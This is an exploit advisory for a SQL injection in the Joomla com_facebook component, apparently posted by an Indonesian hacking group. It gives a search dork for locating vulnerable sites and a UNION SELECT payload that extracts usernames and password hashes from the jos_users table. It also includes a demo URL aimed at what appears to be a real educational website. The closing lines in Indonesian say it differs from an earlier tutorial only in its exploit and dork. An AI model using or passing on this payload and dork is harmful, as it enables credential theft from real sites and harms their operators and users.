############################################################
## Joomla Component com_facebook SQL injection vulnerability - (id) #
## Author : FLAZER 404 #
## Homepage : http://www.indonesiancoder.com #
############################################################
[ Software Information ]
[+] Vendor : -
[+] Download : http://joomlacode.org/gf/project/joomla-facebook/
[+] version : -
[+] Vulnerability : SQL injection
[+] Dork : inurl:"com_facebook"
[ Exploit ]
-666+union+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11,12+from+jos_users--
[ Demo ]
http://www.engineering.edu.sg/index.php?option=com_facebook&view=student&id=-666+union+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11,12+from+jos_users--
##################################################################################
totur yang ini gak jauh beda sama yang totur sebelum nya cuman beda exploit & dork nya
buat para master lewat aja ya :*
Copyright 0.CODE
